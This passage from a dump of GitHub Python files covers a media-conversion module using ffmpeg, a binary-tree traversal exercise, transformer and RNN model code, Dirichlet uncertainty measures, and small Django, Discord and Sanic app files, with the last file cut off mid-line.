round(source_size*8/float(source_meta[\"mplayer\"][\"id\"][\"length\"])/1000)\n\t\t\tresults = []\n\t\t\tclass ConversionDescription:\n\t\t\t\tdef __init__( self, role, width, media_type, rate=0, condition=lambda x: True ):\n\t\t\t\t\tself.role = role\n\t\t\t\t\tself.width = width\n\t\t\t\t\tself.media_type = media_type\n\t\t\t\t\tself.rate = rate\n\t\t\t\t\tself.condition = condition\n\t\t\t\tdef applies( self ):\n\t\t\t\t\treturn self.condition(self)\n\t\t\t\tdef __eq__( self, other ):\n\t\t\t\t\t# rate is not part of equality, because this is used to compare conversion candidates with already existing substitutes \n\t\t\t\t\t# and bitrate is deemed to specific for that purpose; we just assume rates are ok/equal for a given size\n\t\t\t\t\treturn (\t(self.role, self.width, self.media_type, self.applies()) ==\n\t\t\t\t\t\t\t\t(other.role, other.width, other.media_type, other.applies()) )\n\t\t\t\tdef __str__( self ):\n\t\t\t\t\treturn( \"(role=%s, width=%dpx, media_type=%s, rate=%dk, applies=%s)\" % (self.role, self.width, self.media_type, self.rate, str(self.applies())) )\n\t\t\t# 
we want a poster image, an mp4-substitute in source_width for non-mp4 sources and a scaled down mp4-substitute for big sources:\n\t\t\tmissing_conversions = [\n\t\t\t\tConversionDescription( role=\"poster\", width=min(1280, source_width), media_type=\"image/jpeg\" ),\n\t\t\t\tConversionDescription( role=\"compatible\", width=source_width, media_type=\"video/mp4\", rate=source_rate,\n\t\t\t\t\t\t condition = lambda self: source_obj.media_type != \"video/mp4\" ),\n\t\t\t\tConversionDescription( role=\"compatible\", width=min(1280, source_width), media_type=\"video/mp4\", rate=min(2000, source_rate),\n\t\t\t\t\t\t condition = lambda self: (self.width < (source_width*0.8)) and (self.rate < (source_rate*0.8)) ),\n\t\t\t]\n\t\t\tc = app.db.cursor()\n\t\t\t# First we have to check whether the requested object is itself already a substitute object, ...\n\t\t\tc.execute( \"\"\"select original_id from substitutes where substitute_id=?\"\"\", [source_obj.id] )\n\t\t\tif c.fetchone():\n\t\t\t\t# ... because no further substitute objects should be generated for substitute objects.\n\t\t\t\tmissing_conversions = []\n\t\t\tc.execute( \"\"\"select s.substitute_id, s.type, s.size, s.priority, sobj.id from substitutes s\n\t\t\t\t\t\t\tleft join objects sobj on sobj.id=s.substitute_id\n\t\t\t\t\t\t\twhere s.original_id=?\"\"\", [source_obj.id] )\n\t\t\tfor row in c:\n\t\t\t\tsubstitute = { \"substitute_id\" : int(row[0]), \"type\" : row[1], \"size\" : int(row[2]), \"priority\" : int(row[3]) }\n\t\t\t\tsobj_id = row[4]\n\t\t\t\tif sobj_id==None:\n\t\t\t\t\t# Clean up zombie substitutes (FIXME: should this be handled by DBObject.delete()?):\n\t\t\t\t\tdel_c = app.db.cursor()\n\t\t\t\t\tdel_c.execute( \"\"\"delete from substitutes where substitute_id=?\"\"\", [substitute[\"substitute_id\"]] )\n\t\t\t\telse:\n\t\t\t\t\tsubstitute_obj = db_object.DBObject( app, object_id=substitute[\"substitute_id\"] )\n\t\t\t\t\tconversion = ConversionDescription( role=substitute[\"type\"], width=substitute[\"size\"], media_type=substitute_obj.media_type )\n\t\t\t\t\tif conversion in missing_conversions:\n\t\t\t\t\t\tif substitute[\"type\"]==\"poster\" and (new_poster_offset or new_poster_obj):\n\t\t\t\t\t\t\t# remove the existing poster substitute, since it is about to be redefined:\n\t\t\t\t\t\t\tdel_c = app.db.cursor()\n\t\t\t\t\t\t\tdel_c.execute( \"\"\"delete from substitutes where original_id=? 
and substitute_id=?\"\"\", [source_obj.id,substitute_obj.id] )\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tmissing_conversions.remove( conversion )\n\t\t\t\t\t\t\tresults.append( substitute )\n\t\t\t\t\telse:\n\t\t\t\t\t\tresults.append( substitute )\n\t\t\terror_list = []\n\t\t\tif mode == \"convert\":\n\t\t\t\t# Create all missing objects immediately, without data, to avoid converting anything more than once:\n\t\t\t\tnew_objects = []\n\t\t\t\tfor conversion in [x for x in missing_conversions if x.applies()]:\n\t\t\t\t\t# Privilege escalation so that not only the owner of the target object can run this code:\n\t\t\t\t\tapp_old_user = app.user\n\t\t\t\t\tapp.user = user.get_admin_user(app)\n\t\t\t\t\texisting_object_id = None\n\t\t\t\t\tif conversion.role==\"poster\" and new_poster_obj:\n\t\t\t\t\t\texisting_object_id = new_poster_obj.id\n\t\t\t\t\tnew_obj = files.File( app, object_id=existing_object_id, parent_id=source_obj.id, media_type=conversion.media_type )\n\t\t\t\t\tif not existing_object_id:\n\t\t\t\t\t\tnew_obj.conversion = conversion\n\t\t\t\t\t\tnew_objects.append( new_obj )\n\t\t\t\t\tsubstitute = { \"substitute_id\" : new_obj.id, \"type\" : conversion.role, \"size\" : conversion.width, \"priority\" : None }\n\t\t\t\t\tresults.append( substitute )\n\t\t\t\t\tapp.user = app_old_user\n\t\t\t\t\tc = app.db.cursor()\n\t\t\t\t\tc.execute( \"\"\"insert into substitutes (original_id, substitute_id, type, size) values(?,?,?,?)\"\"\", \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t[source_obj.id, new_obj.id, conversion.role, conversion.width] )\n\t\t\t\t# Run the conversion jobs for the objects just created:\n\t\t\t\tfor new_obj in new_objects:\n\t\t\t\t\t# this may take a long time, so we have to commit first:\n\t\t\t\t\tapp.db.commit()\n\t\t\t\t\tbase_type, sub_type = new_obj.media_type.split(\"/\")\n\t\t\t\t\tnew_tmp_name = new_obj.storage_path+\".tmp.\"+sub_type\n\t\t\t\t\tif( re.match(r\"^video/.*\", new_obj.media_type) ):\n\t\t\t\t\t\t# Convert with changed width while preserving the aspect ratio:\n\t\t\t\t\t\t# http://stackoverflow.com/questions/8218363/maintaining-ffmpeg-aspect-ratio\n\t\t\t\t\t\tp = subprocess.Popen( [\"ffmpeg\", \"-y\", \"-i\", source_obj.storage_path, \"-vf\", \"scale=%d:trunc(ow/a/2)*2\" % (new_obj.conversion.width), \n\t\t\t\t\t\t\t\t\t\t\t\t\t\"-r\", \"25\", \"-b\", \"%dk\" % new_obj.conversion.rate, \"-qmin\", \"0\", \"-strict\", \"-2\", new_tmp_name],\n\t\t\t\t\t\t\t\t\t\t\t\tstdout=subprocess.PIPE, stderr=subprocess.PIPE )\n\t\t\t\t\telif( new_obj.conversion.role==\"poster\" and new_obj.media_type == \"image/jpeg\" ):\n\t\t\t\t\t\t# Extract a preview image at time index 3s:\n\t\t\t\t\t\tp = subprocess.Popen( [\"ffmpeg\", \"-y\", \"-i\", source_obj.storage_path, \"-vf\", \"scale=%d:trunc(ow/a/2)*2\" % (new_obj.conversion.width), \n\t\t\t\t\t\t\t\t\t\t\t\t\t\"-ss\", str(new_poster_offset if new_poster_offset else 3), \"-vframes\", \"1\", new_tmp_name],\n\t\t\t\t\t\t\t\t\t\t\t\tstdout=subprocess.PIPE, stderr=subprocess.PIPE )\n\t\t\t\t\telse:\n\t\t\t\t\t\traise NotImplementedError( \"missing operation for conversion: %s\" % (str(new_obj.conversion)) )\n\t\t\t\t\tstdout, stderr = p.communicate()\n\t\t\t\t\tif p.returncode!=0:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t# FIXME: factor the delete logic out into DBObject and the file cleanup into files.File:\n\t\t\t\t\t\t\t# Privilege escalation so that not only the owner of the target object can run this code:\n\t\t\t\t\t\t\tapp_old_user = app.user\n\t\t\t\t\t\t\tapp.user = 
user.get_admin_user(app)\n\t\t\t\t\t\t\tdb_object.DBObject.delete_in( app, [new_obj.id] )\n\t\t\t\t\t\t\tapp.user = app_old_user\n\t\t\t\t\t\t\tos.remove( new_tmp_name )\n\t\t\t\t\t\t\tc = app.db.cursor()\n\t\t\t\t\t\t\tc.execute( \"\"\"delete from substitutes where original_id=? and substitute_id=?\"\"\", [source_obj.id, new_obj.id] )\n\t\t\t\t\t\t\tresults = [x for x in results if x[\"substitute_id\"]!=new_obj.id]\n\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\terror_list.append( e )\n\t\t\t\t\t\terrmsg = stderr.decode().split(\"\\n\")[-1]\n\t\t\t\t\t\terror_list.append( errors.InternalProgramError(errmsg) )\n\t\t\t\t\telse:\n\t\t\t\t\t\tos.rename( new_tmp_name, new_obj.storage_path )\n\t\t\t# Error handling:\n\t\t\tif error_list:\n\t\t\t\tmsg = \"\"\n\t\t\t\tfor error in error_list:\n\t\t\t\t\tif msg:\n\t\t\t\t\t\tmsg += \"; \"\n\t\t\t\t\tmsg += str(error)\n\t\t\t\traise errors.InternalProgramError( msg )\n\t\t\telse:\n\t\t\t\tfor result in results:\n\t\t\t\t\tresult[\"substitute_object\"] = get_module.get(app, object_ids=[result[\"substitute_id\"]])\n\t\t\t\tresponse.output = json.dumps( {\"succeeded\": True,\n\t\t\t\t\t\t\t\t\t\t\"substitutes\": results} )\n\t\telif re.match( r\"^audio/.*\", source_obj.media_type ):\n\t\t\t# TODO: add safe conversions\n\t\t\tresults = []\n\t\t\tresponse.output = json.dumps( {\"succeeded\": True,\n\t\t\t\t\t\t\t\t\t\"substitutes\": results} )\n\t\telse:\n\t\t\traise NotImplementedError( \"unsupported media type: \"+source_obj.media_type )\n\telse:\n\t\traise errors.PrivilegeError()\n","repo_name":"syslock/ems","sub_path":"modules/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":8839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4258843613","text":"class TreeNode():\n def __init__(self,value) -> None:\n self.value=value\n self.left=None\n self.right=None\ndef insert_alter(root:TreeNode,value:int)->TreeNode:\n if root is None:\n return TreeNode(value)\n else:\n if root.value>=value:\n root.left=insert_alter(root.left,value)\n else:\n root.right=insert_alter(root.right,value)\n return root\ndef level_order_traversal(root:TreeNode)->list:\n queue=list()\n answer=list()\n queue.append(root)\n while(len(queue)):\n length=len(queue)\n temp=[]\n for _ in range(length):\n q=queue.pop(0)\n temp.append(q.value)\n if q.left:\n queue.append(q.left)\n if q.right:\n queue.append(q.right)\n answer.append(temp)\n return answer\ndef pre_order_traversal(root:TreeNode)->None:\n if root is not None:\n print(root.value,end=' ')\n pre_order_traversal(root.left)\n pre_order_traversal(root.right)\ndef in_order_traversal(root:TreeNode)->None:\n if root is not None:\n in_order_traversal(root.left)\n print(root.value,end=' ')\n in_order_traversal(root.right)\ndef post_order_traversal(root:TreeNode)->None:\n if root is not None:\n post_order_traversal(root.left)\n post_order_traversal(root.right)\n print(root.value,end=' ')\nif __name__=='__main__':\n tree=TreeNode(5)\n insert_alter(tree,3)\n insert_alter(tree,2)\n insert_alter(tree,4)\n insert_alter(tree,7)\n insert_alter(tree,6)\n insert_alter(tree,8)\n lister=level_order_traversal(tree)\n print(lister)\n pre_order_traversal(tree)\n print()\n in_order_traversal(tree)\n print()\n post_order_traversal(tree)\n","repo_name":"farhan1503001/Hackerrank-Python-Language-Problems","sub_path":"Python 
datastructuresleetcode/level_order_traversal.py","file_name":"level_order_traversal.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"10672782696","text":"'''@file model.py\ncontains the Model class.\nDuring training, using the greedy-search decoder, there is a loss.\nDuring dev/infer, using the beam-search decoder, there are no logits and therefore no loss, only preds,\nbecause we cannot access labels on the dev set and must depend on the previous time step's decision.\n\nSo there are only two modes: infer and training.\n'''\n\nimport tensorflow as tf\nimport logging\n\nfrom .seq2seqModel import Seq2SeqModel, SOS_IDX\nfrom .utils.tools import right_shift_rows\n\n\nclass Transformer(Seq2SeqModel):\n '''a general class for an encoder decoder system\n '''\n\n def __init__(self, tensor_global_step, encoder, decoder, training, args,\\\n batch=None, name='transformer'):\n '''Model constructor\n Args:\n '''\n self.name = name\n self.args = args\n self.training = training\n super().__init__(tensor_global_step, encoder, decoder, training,\\\n args, batch, name=name)\n\n def __call__(self, feature, len_features, labels=None, len_labels=None, reuse=False):\n with tf.variable_scope(self.name, reuse=reuse):\n encoder = self.gen_encoder(\n training=self.training,\n args=self.args)\n decoder = self.gen_decoder(\n training=self.training,\n global_step=self.global_step,\n args=self.args)\n\n with tf.variable_scope(encoder.name or 'encoder'):\n encoded, len_encoded = encoder(feature, len_features)\n\n with tf.variable_scope(decoder.name or 'decoder'):\n if not self.training: # infer phase\n if self.args.beam_size>1:\n logging.info('beam search with language model ...')\n results, preds, len_decoded = decoder.beam_decode_rerank(\n encoded,\n len_encoded)\n else:\n logging.info('greedy search ...')\n logits, preds, len_decoded = decoder.decoder_with_caching(\n encoded,\n len_encoded)\n else:\n logging.info('teacher-forcing training ...')\n labels_sos = right_shift_rows(\n p=labels,\n shift=1,\n pad=SOS_IDX)\n\n logits, preds, len_decoded = decoder(\n encoded=encoded,\n len_encoded=len_encoded,\n decoder_input=labels_sos)\n\n return logits, preds, len_decoded\n","repo_name":"eastonYi/asr-tf1","sub_path":"models/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"70274020883","text":"import json\nfrom pathlib import Path\n\nfrom discord.ext import commands\n\nfrom database import db\n\nLOCALES = {}\nfor i in Path('bot/translated/').glob('*.json'):\n with open(i.absolute(), encoding='utf-8') as f:\n LOCALES[i.stem.lower()] = json.load(f)\n\n\nasync def get_phrase(ctx: commands.Context, key: str) -> str:\n global LOCALES\n\n lang = await db.get_language(ctx)\n lang = lang.lower()\n if lang not in LOCALES:\n return LOCALES['en'][key]\n\n try:\n return LOCALES[lang][key]\n except KeyError:\n return LOCALES['en'][key]\n","repo_name":"l4blee/nosok","sub_path":"bot/languages.py","file_name":"languages.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"74624346960","text":"\"\"\"djangoProj182 URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. 
Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom ProfileApp import views\n\nurlpatterns = [\n path('Profile', views.Profile, name=\"Profile\"),\n path('Education', views.Education, name=\"Education\"),\n path('Attention', views.Attention, name=\"Attention\"),\n path('Career', views.Career, name=\"Career\"),\n path('RoleModel', views.RoleModel, name=\"RoleModel\"),\n path('ShowMyData', views.ShowMyData, name=\"ShowMyData\"),\n path('listProduct', views.listProduct, name='listProduct'),\n path('inputProduct', views.inputProduct, name='inputProduct'),\n path('showGoodsList', views.showGoodsList, name='showGoodsList'),\n]\n","repo_name":"arrichaChamontee/djangoProj182","sub_path":"ProfileApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72765393680","text":"svar=input(\"Hur många grader i farenheit?: \")#tar in vilken farenheit det är ## kan göras bättre\nf=float(svar)#omvandlar svaret till formel formen\nc=(f-32)*5/9#räknar om farenheit till celsius\nprint(c,\"grader celsius\")#skriver ut vilken grader celsius det är\n\nif c>30:\n print (c,\"Sir, it's very hot today\")\nelif c<-10: \n print (c,\"Sir, bring plenty of clothes\")\nelse:\n print (c, \"Sir, the temperature is to your liking\")","repo_name":"Derpmander/OVNING_2.11","sub_path":"ovn_2.3.py","file_name":"ovn_2.3.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"sv","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73242706960","text":"from scipy.special import psi, gammaln\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score\nimport tensorflow as tf\n\n\ndef dirichlet_kl_divergence(alpha_c_target, alpha_c_pred, eps=10e-10):\n\n alpha_0_target = tf.reduce_sum(alpha_c_target, axis=-1, keepdims=True)\n alpha_0_pred = tf.reduce_sum(alpha_c_pred, axis=-1, keepdims=True)\n\n term1 = tf.math.lgamma(alpha_0_target) - tf.math.lgamma(alpha_0_pred)\n term2 = tf.math.lgamma(alpha_c_pred + eps) - tf.math.lgamma(alpha_c_target + eps)\n\n term3_tmp = tf.math.digamma(alpha_c_target + eps) - tf.math.digamma(alpha_0_target + eps)\n term3 = (alpha_c_target - alpha_c_pred) * term3_tmp\n\n result = tf.squeeze(term1 + tf.reduce_sum(term2 + term3, keepdims=True, axis=-1))\n\n return result\n\n\ndef dirichlet_kl_divergence_reverse(alpha_c_target, alpha_c_pred, eps=10e-10):\n return dirichlet_kl_divergence(alpha_c_target=alpha_c_pred,\n alpha_c_pred=alpha_c_target,\n eps=eps)\n\ndef concentrations_from_logits(logits):\n logits = tf.cast(logits, tf.float64)\n alpha_c = tf.exp(logits)\n alpha_c = tf.clip_by_value(alpha_c, clip_value_min=10e-25, clip_value_max=10e25)\n return alpha_c\n\ndef log_sum(logits, keepdims=False):\n return tf.reduce_sum(logits, axis=-1, keepdims=keepdims)\n\ndef probability_from_concentration(alpha_c):\n alpha_0 = tf.reduce_sum(alpha_c, axis=-1, keepdims=True)\n return alpha_c / alpha_0\n\n\ndef probability_from_logits(logits):\n alpha_c = concentrations_from_logits(logits)\n prob = probability_from_concentration(alpha_c)\n return 
prob\n\n\ndef max_probability_from_logits(logits):\n prob = probability_from_logits(logits)\n return tf.reduce_max(prob, axis=-1)\n\n\ndef precision_from_logits(logits, keepdims=False):\n alpha_c = concentrations_from_logits(logits)\n return tf.reduce_sum(alpha_c, axis=-1, keepdims=keepdims)\n\n\ndef entropy(logits, keepdims=False):\n prob = probability_from_logits(logits)\n return -tf.reduce_sum(prob * tf.math.log(prob), axis=-1, keepdims=keepdims)\n\n\ndef differential_entropy(logits):\n alpha_c = concentrations_from_logits(logits)\n alpha_0 = tf.reduce_sum(alpha_c, axis=-1, keepdims=True)\n\n lgamma_alpha_c = tf.math.lgamma(alpha_c)\n lgammaln_alpha_0 = tf.math.lgamma(alpha_0)\n\n digamma_alpha_c = tf.math.digamma(alpha_c)\n digamma_alpha_0 = tf.math.digamma(alpha_0)\n\n temp_mat = tf.reduce_sum((alpha_c - 1) * (digamma_alpha_c - digamma_alpha_0), axis=-1)\n metric = tf.reduce_sum(lgamma_alpha_c, axis=-1) - lgammaln_alpha_0 - temp_mat\n return metric\n\n\ndef mutual_information(logits):\n alpha_c = concentrations_from_logits(logits)\n\n alpha_0 = tf.reduce_sum(alpha_c, axis=-1, keepdims=True)\n\n digamma_alpha_c = tf.math.digamma(alpha_c + 1)\n digamma_alpha_0 = tf.math.digamma(alpha_0 + 1)\n alpha_div = alpha_c / alpha_0\n\n temp_mat = tf.reduce_sum(- alpha_div * (tf.math.log(alpha_c) - digamma_alpha_c), axis=-1)\n metric = temp_mat + tf.squeeze(tf.math.log(alpha_0) - digamma_alpha_0)\n\n return metric\n\ndef differential_entropy (logits):\n logits = logits.astype('float64')\n alpha_c = np.exp(logits)\n alpha_c = np.clip(alpha_c, 10e-10, 10e10) \n alpha_0 = np.sum(alpha_c, axis=-1)\n gammaln_alpha_c = gammaln(alpha_c)\n gammaln_alpha_0 = gammaln(alpha_0)\n \n psi_alpha_c = psi(alpha_c)\n psi_alpha_0 = psi(alpha_0)\n psi_alpha_0 = np.expand_dims(psi_alpha_0, axis = 1)\n \n temp_mat = np.sum((alpha_c-1)*(psi_alpha_c-psi_alpha_0), axis = 1)\n \n metric = np.sum(gammaln_alpha_c, axis=-1) - gammaln_alpha_0 - temp_mat\n return metric\n \ndef mutual_info(logits):\n logits = logits.astype('float64')\n alpha_c = np.exp(logits)\n alpha_c = np.clip(alpha_c, 10e-10, 10e10) \n alpha_0 = np.sum(alpha_c, axis=-1, keepdims = True)\n \n psi_alpha_c = psi(alpha_c+1)\n psi_alpha_0 = psi(alpha_0+1)\n alpha_div = alpha_c / alpha_0\n \n temp_mat = np.sum(- alpha_div*(np.log(alpha_c) - psi_alpha_c), axis=-1)\n metric = temp_mat + np.squeeze(np.log(alpha_0) - psi_alpha_0)\n return metric\n\ndef _get_prob(logits):\n logits = logits.astype('float64')\n alpha_c = np.exp(logits)\n alpha_c = np.clip(alpha_c, 10e-25, 10e25)\n alpha_0 = np.sum(alpha_c, axis=-1)\n alpha_0 = np.expand_dims(alpha_0, axis=-1)\n \n return (alpha_c/ alpha_0)\n \ndef entropy(logits):\n logits = logits.astype('float64')\n prob = np.clip(_get_prob(logits), a_min=10e-25, a_max=np.inf)\n exp_prob = np.log(prob)\n\n ent = -np.sum(prob*exp_prob, axis=-1)\n return ent\n\ndef max_prob (logits):\n logits = logits.astype('float64')\n prob = _get_prob(logits)\n metric = np.max(prob, axis=-1)\n return metric\n\ndef get_scores(in_predict, out_predict, save_path=\"./\", name=\"\", evidential=False):\n\n name = name + \"_\" if name != \"\" else \"\"\n gt_neg_in = np.zeros_like(in_predict[:,0])\n gt_neg_out = np.ones_like(out_predict[:,0])\n gtNeg = np.append(gt_neg_in, gt_neg_out, axis= 0)\n\n logits = np.append(in_predict, out_predict, axis= 0)\n\n roc_prob = round(roc_auc_score(gtNeg, -max_prob(logits)) *100, 2)\n roc_log_sum = round(roc_auc_score(gtNeg, -log_sum(logits)) *100, 2)\n roc_precision = round(roc_auc_score(gtNeg, 
-precision_from_logits(logits))*100, 2)\n roc_mi = round(roc_auc_score(gtNeg, mutual_info(logits)) *100, 2)\n roc_ent = round(roc_auc_score(gtNeg, entropy(logits)) *100, 2)\n\n print(f\"Separation Performance AUROC scores: \\n\",\n f\" max. probability: {roc_prob}\\n\",\n f\" Log-Sum: {roc_log_sum}\\n\",\n f\" Precision: {roc_precision}\\n\",\n f\" Mutual Information: {roc_mi}\\n\",\n f\" Entropy: {roc_ent}\\n\")","repo_name":"JakobCode/dpn_rs","sub_path":"Measures/Measures.py","file_name":"Measures.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"69974595601","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 4 11:11:10 2019\n\n@author: Hp\n\"\"\"\n\ninput_string = input(\"Enter the string :\")\ncount = 0\nlist = []\nlower = input_string.lower()\nfor alpha in lower:\n list.append(alpha)\n\nfinal_list = [] \n\nfor num in list: \n if num not in final_list: \n final_list.append(num) \n \nfor elements in final_list:\n if elements in 'abcdefghijklmnopqrstuvwxyz':\n count += 1\nif count == 26:\n print (\"Pangram\")\nelse:\n print (\"Not Pangram\")\n ","repo_name":"Aman08-forsk/FSDP_2019","sub_path":"Day02/pangram.py","file_name":"pangram.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7321236381","text":"from common import common_global\nfrom sanic import Blueprint\n\nblueprint_admin_emulation = Blueprint('name_blueprint_admin_emulation', url_prefix='/admin')\n\n\n@blueprint_admin_emulation.route(\"/admin_emulation\", methods=[\"GET\", \"POST\"])\n@common_global.jinja_template.template('bss_admin/bss_admin_emulation.html')\n@common_global.auth.login_required\nasync def url_bp_emulation(request):\n \"\"\"\n Game metadata stats and update screen\n \"\"\"\n data_mame_version = None\n return {\n 'data_mame_version': data_mame_version,\n }\n","repo_name":"MediaKraken/MediaKraken_Deployment","sub_path":"source/web_app_sanic/blueprint/admin/bp_admin_emulation.py","file_name":"bp_admin_emulation.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"8900734511","text":"\nimport torch\nimport torch.nn as nn\nfrom pathlib import Path\nimport os\nimport numpy as np\nimport json\n\nclass Net(nn.Module):\n def __init__(self, input_size, hidden_size, output_size):\n super(Net, self).__init__()\n self.lstm = nn.LSTM(input_size, hidden_size)\n self.linear = nn.Linear(hidden_size, output_size)\n\n def forward(self, x):\n out, hidden = self.lstm(x)\n x = self.linear(out)\n return x, out\n\nclass CTRNN(nn.Module):\n \"\"\"Continuous-time RNN.\n\n Args:\n input_size: Number of input neurons\n hidden_size: Number of hidden neurons\n\n Inputs:\n input: (seq_len, batch, input_size), network input\n hidden: (batch, hidden_size), initial hidden activity\n \"\"\"\n\n def __init__(self, input_size, hidden_size,tf,rank=1,dt=None, noise=1, device='cpu',**kwargs):\n super().__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.tau = 100\n if dt is None:\n alpha = 1\n else:\n alpha = dt / self.tau\n self.alpha = alpha\n self.oneminusalpha = 1 - alpha\n self.tf = tf\n\n #self.input2h = nn.Linear(input_size, hidden_size,bias=False)\n #self.input2h.requires_grad_(False)\n\n # self.input_stim = nn.Parameter(torch.randn(2, hidden_size))#.to(device)#.detach()\n # 
self.input_stim.requires_grad_(False)\n # self.input_ctx= nn.Parameter(torch.randn(2, hidden_size))#.to(device)#.detach()\n\n self.IA = nn.Parameter(torch.randn(1,hidden_size).type(torch.float))\n self.IA.requires_grad_(False)\n\n self.IB =nn.Parameter(torch.randn(1,hidden_size).type(torch.float))\n self.IB.requires_grad_(False)\n\n self.IXA = nn.Parameter(torch.randn(1,hidden_size).type(torch.float))\n self.IXB =nn.Parameter(torch.randn(1,hidden_size).type(torch.float))\n \n #self.IXA.requires_grad_(False)\n #self.IXB.requires_grad_(False)\n\n\n #self.m = nn.Parameter(torch.randn(hidden_size,rank).type(torch.float)/self.hidden_size)\n #self.n =nn.Parameter(torch.randn(hidden_size,rank).type(torch.float)/self.hidden_size)\n \n self.m = nn.Parameter(torch.randn(hidden_size).type(torch.float)/self.hidden_size)\n self.n =nn.Parameter(torch.randn(hidden_size).type(torch.float)/self.hidden_size)\n \n \n #self.m2 = nn.Parameter(torch.randn(hidden_size).type(torch.float)/self.hidden_size)\n #self.n2 =nn.Parameter(torch.randn(hidden_size).type(torch.float)/self.hidden_size)\n\n\n #self.m.requires_grad_(False)\n #self.n.requires_grad_(False)\n\n\n self.noise = noise\n self.device = device\n \n def init_hidden(self, input_shape):\n batch_size = input_shape[1]\n\n return torch.zeros(batch_size, self.hidden_size) \n\n def recurrence(self, input, hidden):\n \n\n stims_input,ctx_input = input[:,:2],input[:,2:]\n A,B,XA,XB = input[:,0],input[:,1],input[:,2],input[:,3]\n # W = torch.mm(self.m,self.n.T) #+ \n W = torch.outer(self.m,self.n.T)\n\n #pre_activation = torch.mm(stims_input,self.input_stim) + torch.mm(ctx_input,self.input_ctx) + torch.mm(torch.outer(self.m,self.n.T),torch.tanh(hidden).T).T \n\n \n pre_activation =A[:,None] @ self.IA + B[:,None] @ self.IB + \\\n XA[:,None] @ self.IXA + XB[:,None] @ self.IXB + \\\n torch.mm(W,self.tf(hidden).T).T \n\n rec_noise = torch.randn(self.hidden_size)*self.noise\n rec_noise = torch.randn(pre_activation.shape)*self.noise\n pre_activation += rec_noise.to(input.device)\n \n # pre_activation = self.input2h(input) + torch.mm(torch.matmul(self.m[:,None],self.n[None,:]),torch.tanh(hidden).T).T \n\n #h_new = torch.tanh(hidden) * self.oneminusalpha + pre_activation * self.alpha\n h_new = hidden * self.oneminusalpha + pre_activation * self.alpha\n return h_new,pre_activation\n\n def forward(self, input, hidden=None):\n \"\"\"Propogate input through the network.\"\"\"\n if hidden is None:\n hidden = self.init_hidden(input.shape).to(input.device)\n\n output = []\n steps = range(input.size(0))\n X = []\n for i in steps:\n hidden, x = self.recurrence(input[i], hidden)\n output.append(hidden)\n X.append(x)\n\n output = torch.cat(output, 0).view(input.size(0), *output[0].size())\n X = torch.cat(X, 0).view(input.size(0), *X[0].size())\n\n return output, hidden, X\n\n\nclass RNNNet(nn.Module):\n \"\"\"Recurrent network model.\n\n Args:\n input_size: int, input size\n hidden_size: int, hidden size\n output_size: int, output size\n rnn: str, type of RNN, lstm, rnn, ctrnn, or eirnn\n \"\"\"\n def __init__(self, input_size, hidden_size, output_size, noise, tf=torch.tanh,device=\"cpu\",**kwargs):\n super().__init__()\n\n # Continuous time RNN\n self.rnn = CTRNN(input_size, hidden_size, tf,noise=noise,device=device,**kwargs)\n self.fc = nn.Parameter(torch.randn(hidden_size, output_size)/hidden_size) #nn.Linear(hidden_size, output_size)\n #self.fc = nn.Linear(hidden_size, output_size)\n self.tf = tf\n self.fc.requires_grad_(False)\n\n def forward(self, x):\n rnn_activity, _, X = 
self.rnn(x)\n out = rnn_activity @ self.fc\n\n #out = self.fc(rnn_activity)\n\n return out, rnn_activity\n \n def set_vecs(self,n1, m1, w, IA, IB, IctxA, IctxB):\n \n self.fc = nn.Parameter(w)\n self.rnn.n = nn.Parameter(n1)\n self.rnn.m = nn.Parameter(m1)\n self.rnn.IA = nn.Parameter(IA)\n self.rnn.IB = nn.Parameter(IB)\n self.rnn.IXA = nn.Parameter(IctxA)\n self.rnn.IXB = nn.Parameter(IctxB)\n\n\n\n \ndef test_net(net=None,env=None,envid=None,num_trials=100,device=\"cuda\"):\n\n with torch.no_grad():\n\n # if no network provided, load it \n # and infer environment from envid\n if net == None:\n assert envid, env\n modelpath = get_modelpath(envid)\n\n with open(modelpath / 'config.json') as f:\n config = json.load(f)\n \n net = RNNNet(input_size=env.observation_space.shape[0],\n hidden_size=config['hidden_size'],\n output_size=env.action_space.n,noise=config['noise'])\n net.load_state_dict(torch.load(modelpath / 'net.pth'))\n\n all_obs = []\n all_gts = []\n activity = []\n all_choices=[]\n X = []\n for i in range(num_trials):\n env.new_trial()\n ob, gt = env.ob, env.gt\n inputs = torch.from_numpy(ob[:, 